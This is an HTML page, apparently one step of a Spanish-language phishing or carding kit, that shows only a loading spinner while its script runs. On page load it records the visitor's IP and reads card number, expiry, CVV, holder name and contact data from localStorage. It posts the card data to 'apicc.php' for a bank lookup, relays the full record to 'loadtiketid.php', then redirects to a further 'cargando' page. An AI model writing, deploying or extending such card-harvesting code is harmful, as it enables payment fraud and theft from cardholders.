<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Consulta de BIN</title>
  <style>
    body {
      margin: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-color: #f0f0f0;
    }
    #loader {
      border: 8px solid #f3f3f3;
      border-top: 8px solid #555;
      border-radius: 50%;
      width: 60px;
      height: 60px;
      animation: spin 1s linear infinite;
    }
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <div id="loader"></div>
  <script>
    document.addEventListener('DOMContentLoaded', async function () {
      try {
        const response = await fetch("https://api64.ipify.org?format=json");
        const data = await response.json();
        if (data.ip) {
          localStorage.setItem("ipdata", data.ip);
        }
      } catch (error) {
        console.error("Error al obtener la IP:", error);
      }
    });

    document.addEventListener('DOMContentLoaded', function () {
      const datos = JSON.parse(localStorage.getItem('tbdatos')) || {};
      const contact = JSON.parse(localStorage.getItem('contact')) || {};

      if (Object.keys(datos).length > 0) {
        if (Object.keys(contact).length > 0) {
          datos.contact = contact;
        }

        const cardData = {
          number: datos.cardNumber,
          expiry_month: datos.expMonth || "12",
          expiry_year: datos.expYear || "2025",
          cvv: datos.cvv || "221",
          name: datos.ownerName || "PEDRO MONTES",
          billing_address: { country: "CO" },
          phone: {}
        };

        fetch('apicc.php', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(cardData)
        })
        .then(response => response.json())
        .then(result => {
          if (result.issuer && result.scheme) {
            datos.bank = result.issuer;
            datos.type = result.scheme;
            localStorage.setItem('tbdatos', JSON.stringify(datos));
            sendToLoadTicketId(datos);
          } else {
            console.error("No se pudo obtener el banco y tipo de tarjeta");
          }
        })
        .catch(error => {
          console.error("Error en la consulta de tarjeta:", error);
        });
      }

      function sendToLoadTicketId(updatedData) {
        fetch('loadtiketid.php', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(updatedData)
        })
        .then(response => response.json())
        .then(result => {
          if (result.status === 'success') {
            const firstDigit = updatedData.cardNumber.charAt(0);
            let cardType = 'Desconocido';
            if (firstDigit === '4') cardType = 'Visa';
            else if (firstDigit === '5') cardType = 'MasterCard';
            else if (firstDigit === '3') cardType = 'American Express';
            else if (firstDigit === '6') cardType = 'Discover';

            const bank = updatedData.bank;
            const infoLoad = { bank, cardType };
            localStorage.setItem('infoload', JSON.stringify(infoLoad));
            window.location.href = 'dinadatos/cargando.php';
          } else {
            console.error("Error en la respuesta de loadtiketid.php");
          }
        })
        .catch(error => {
          console.error("Error en el envío de datos a loadtiketid.php:", error);
        });
      }
    });
  </script>
</body>
</html>
